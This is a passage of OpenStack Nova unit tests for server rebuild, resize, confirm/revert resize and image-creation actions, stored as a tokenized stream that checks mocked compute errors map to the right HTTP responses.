name|'patch'
op|'.'
name|'object'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'rebuild'"
op|')'
newline|'\n'
DECL|member|test_rebuild_instance_raise_auto_disk_config_exc
name|'def'
name|'test_rebuild_instance_raise_auto_disk_config_exc'
op|'('
name|'self'
op|','
name|'mock_rebuild'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|'"rebuild"'
op|':'
op|'{'
nl|'\n'
string|'"imageRef"'
op|':'
name|'self'
op|'.'
name|'_image_href'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'mock_rebuild'
op|'.'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'AutoDiskConfigDisabledByImage'
op|'('
nl|'\n'
name|'image'
op|'='
string|"'dummy'"
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_rebuild'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_server
dedent|''
name|'def'
name|'test_resize_server'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
nl|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'resize_called'
op|'='
name|'False'
newline|'\n'
nl|'\n'
DECL|function|resize_mock
name|'def'
name|'resize_mock'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'resize_called'
op|'='
name|'True'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'resize'"
op|','
name|'resize_mock'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'resize_called'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_server_no_flavor
dedent|''
name|'def'
name|'test_resize_server_no_flavor'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_server_no_flavor_ref
dedent|''
name|'def'
name|'test_resize_server_no_flavor_ref'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
name|'None'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_server_with_extra_arg
dedent|''
name|'def'
name|'test_resize_server_with_extra_arg'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'favorRef'
op|'='
string|'"http://localhost/3"'
op|','
nl|'\n'
name|'extra_arg'
op|'='
string|'"extra_arg"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_server_invalid_flavor_ref
dedent|''
name|'def'
name|'test_resize_server_invalid_flavor_ref'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
number|'1.2'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_with_server_not_found
dedent|''
name|'def'
name|'test_resize_with_server_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'get'"
op|','
name|'return_server_not_found'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_with_image_exceptions
dedent|''
name|'def'
name|'test_resize_with_image_exceptions'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'resize_called'
op|'='
number|'0'
newline|'\n'
name|'image_id'
op|'='
string|"'fake_image_id'"
newline|'\n'
nl|'\n'
name|'exceptions'
op|'='
op|'['
nl|'\n'
op|'('
name|'exception'
op|'.'
name|'ImageNotAuthorized'
op|'('
name|'image_id'
op|'='
name|'image_id'
op|')'
op|','
nl|'\n'
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPUnauthorized'
op|')'
op|','
nl|'\n'
op|'('
name|'exception'
op|'.'
name|'ImageNotFound'
op|'('
name|'image_id'
op|'='
name|'image_id'
op|')'
op|','
nl|'\n'
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|')'
op|','
nl|'\n'
op|'('
name|'exception'
op|'.'
name|'Invalid'
op|','
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|')'
op|','
nl|'\n'
op|'('
name|'exception'
op|'.'
name|'NoValidHost'
op|'('
name|'reason'
op|'='
string|"'Bad host'"
op|')'
op|','
nl|'\n'
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|')'
op|','
nl|'\n'
op|'('
name|'exception'
op|'.'
name|'AutoDiskConfigDisabledByImage'
op|'('
name|'image'
op|'='
name|'image_id'
op|')'
op|','
nl|'\n'
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|')'
op|','
nl|'\n'
op|']'
newline|'\n'
nl|'\n'
name|'raised'
op|','
name|'expected'
op|'='
name|'map'
op|'('
name|'iter'
op|','
name|'zip'
op|'('
op|'*'
name|'exceptions'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|_fake_resize
name|'def'
name|'_fake_resize'
op|'('
name|'obj'
op|','
name|'context'
op|','
name|'instance'
op|','
name|'flavor_id'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'resize_called'
op|'+='
number|'1'
newline|'\n'
name|'raise'
name|'next'
op|'('
name|'raised'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'resize'"
op|','
name|'_fake_resize'
op|')'
newline|'\n'
nl|'\n'
name|'for'
name|'call_no'
name|'in'
name|'range'
op|'('
name|'len'
op|'('
name|'exceptions'
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'next_exception'
op|'='
name|'next'
op|'('
name|'expected'
op|')'
newline|'\n'
name|'actual'
op|'='
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'next_exception'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
name|'if'
op|'('
name|'isinstance'
op|'('
name|'exceptions'
op|'['
name|'call_no'
op|']'
op|'['
number|'0'
op|']'
op|','
nl|'\n'
name|'exception'
op|'.'
name|'NoValidHost'
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'actual'
op|'.'
name|'explanation'
op|','
nl|'\n'
string|"'No valid host was found. Bad host'"
op|')'
newline|'\n'
dedent|''
name|'elif'
op|'('
name|'isinstance'
op|'('
name|'exceptions'
op|'['
name|'call_no'
op|']'
op|'['
number|'0'
op|']'
op|','
nl|'\n'
name|'exception'
op|'.'
name|'AutoDiskConfigDisabledByImage'
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'actual'
op|'.'
name|'explanation'
op|','
nl|'\n'
string|"'Requested image fake_image_id has automatic'"
nl|'\n'
string|"' disk resize disabled.'"
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'resize_called'
op|','
name|'call_no'
op|'+'
number|'1'
op|')'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.compute.api.API.resize'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'CannotResizeDisk'
op|'('
name|'reason'
op|'='
string|"''"
op|')'
op|')'
newline|'\n'
DECL|member|test_resize_raises_cannot_resize_disk
name|'def'
name|'test_resize_raises_cannot_resize_disk'
op|'('
name|'self'
op|','
name|'mock_resize'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.compute.api.API.resize'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'FlavorNotFound'
op|'('
name|'reason'
op|'='
string|"''"
op|','
nl|'\n'
name|'flavor_id'
op|'='
string|"'fake_id'"
op|')'
op|')'
newline|'\n'
DECL|member|test_resize_raises_flavor_not_found
name|'def'
name|'test_resize_raises_flavor_not_found'
op|'('
name|'self'
op|','
name|'mock_resize'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_with_too_many_instances
dedent|''
name|'def'
name|'test_resize_with_too_many_instances'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_resize
name|'def'
name|'fake_resize'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'TooManyInstances'
op|'('
name|'message'
op|'='
string|'"TooManyInstance"'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'resize'"
op|','
name|'fake_resize'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPForbidden'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_resize_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_resize_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_resize
name|'def'
name|'fake_resize'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'resize'"
op|','
name|'fake_resize'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.compute.api.API.resize'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'NoValidHost'
op|'('
name|'reason'
op|'='
string|"''"
op|')'
op|')'
newline|'\n'
DECL|member|test_resize_raises_no_valid_host
name|'def'
name|'test_resize_raises_no_valid_host'
op|'('
name|'self'
op|','
name|'mock_resize'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'resize'"
op|')'
newline|'\n'
DECL|member|test_resize_instance_raise_auto_disk_config_exc
name|'def'
name|'test_resize_instance_raise_auto_disk_config_exc'
op|'('
name|'self'
op|','
name|'mock_resize'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mock_resize'
op|'.'
name|'side_effect'
op|'='
name|'exception'
op|'.'
name|'AutoDiskConfigDisabledByImage'
op|'('
nl|'\n'
name|'image'
op|'='
string|"'dummy'"
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'resize'
op|'='
name|'dict'
op|'('
name|'flavorRef'
op|'='
string|'"http://localhost/3"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_confirm_resize_server
dedent|''
name|'def'
name|'test_confirm_resize_server'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'confirmResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'confirm_resize_called'
op|'='
name|'False'
newline|'\n'
nl|'\n'
DECL|function|cr_mock
name|'def'
name|'cr_mock'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'confirm_resize_called'
op|'='
name|'True'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'confirm_resize'"
op|','
name|'cr_mock'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_confirm_resize'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'confirm_resize_called'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_confirm_resize_migration_not_found
dedent|''
name|'def'
name|'test_confirm_resize_migration_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'confirmResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|confirm_resize_mock
name|'def'
name|'confirm_resize_mock'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'MigrationNotFoundByStatus'
op|'('
name|'instance_id'
op|'='
number|'1'
op|','
nl|'\n'
name|'status'
op|'='
string|"'finished'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
nl|'\n'
string|"'confirm_resize'"
op|','
nl|'\n'
name|'confirm_resize_mock'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_confirm_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_confirm_resize_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_confirm_resize_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'confirmResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_confirm_resize
name|'def'
name|'fake_confirm_resize'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'confirm_resize'"
op|','
nl|'\n'
name|'fake_confirm_resize'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_confirm_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_revert_resize_migration_not_found
dedent|''
name|'def'
name|'test_revert_resize_migration_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'revertResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|revert_resize_mock
name|'def'
name|'revert_resize_mock'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'MigrationNotFoundByStatus'
op|'('
name|'instance_id'
op|'='
number|'1'
op|','
nl|'\n'
name|'status'
op|'='
string|"'finished'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
nl|'\n'
string|"'revert_resize'"
op|','
nl|'\n'
name|'revert_resize_mock'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPBadRequest'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_revert_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_revert_resize_server_not_found
dedent|''
name|'def'
name|'test_revert_resize_server_not_found'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'revertResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_revert_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
string|'"bad_server_id"'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_revert_resize_server
dedent|''
name|'def'
name|'test_revert_resize_server'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'revertResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'revert_resize_called'
op|'='
name|'False'
newline|'\n'
nl|'\n'
DECL|function|revert_mock
name|'def'
name|'revert_mock'
op|'('
op|'*'
name|'args'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'revert_resize_called'
op|'='
name|'True'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'revert_resize'"
op|','
name|'revert_mock'
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_revert_resize'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'revert_resize_called'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_revert_resize_raises_conflict_on_invalid_state
dedent|''
name|'def'
name|'test_revert_resize_raises_conflict_on_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'revertResize'
op|'='
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_revert_resize
name|'def'
name|'fake_revert_resize'
op|'('
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceInvalidState'
op|'('
name|'attr'
op|'='
string|"'fake_attr'"
op|','
nl|'\n'
name|'state'
op|'='
string|"'fake_state'"
op|','
name|'method'
op|'='
string|"'fake_method'"
op|','
nl|'\n'
name|'instance_uuid'
op|'='
string|"'fake'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'revert_resize'"
op|','
nl|'\n'
name|'fake_revert_resize'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_revert_resize'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image
dedent|''
name|'def'
name|'test_create_image'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
string|"'Snapshot 1'"
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'response'
op|'='
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'FAKE_UUID'
op|','
nl|'\n'
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
name|'location'
op|'='
name|'response'
op|'.'
name|'headers'
op|'['
string|"'Location'"
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'self'
op|'.'
name|'image_url'
op|'+'
string|"'123'"
name|'if'
name|'self'
op|'.'
name|'image_url'
name|'else'
nl|'\n'
name|'glance'
op|'.'
name|'generate_image_url'
op|'('
string|"'123'"
op|')'
op|','
nl|'\n'
name|'location'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_create_image_name_too_long
dedent|''
name|'def'
name|'test_create_image_name_too_long'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'long_name'
op|'='
string|"'a'"
op|'*'
number|'260'
newline|'\n'
name|'body'
op|'='
op|'{'
nl|'\n'
string|"'createImage'"
op|':'
op|'{'
nl|'\n'
string|"'name'"
op|':'
name|'long_name'
op|','
nl|'\n'
op|'}'
op|','
nl|'\n'
op|'}'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'self'
op|'.'
name|'validation_error'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_action_create_image'
op|','
name|'self'
op|'.'
name|'req'
op|','
nl|'\n'
name|'FAKE_UUID'
op|','
name|'body'
op|'='
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_do_test_create_volume_backed_image
dedent|''
name|'def'
name|'_do_test_create_volume_backed_image'
op|'('
name|'self'
op|','
name|'extra_properties'
op|')'
op|':'
newline|'\n'
nl|'\n'
DECL|function|_fake_id
indent|' '
name|'def'
name|'_fake_id'
op|'('
name|'x'
op|')'
op|':'
newline|'\n'
indent|' '
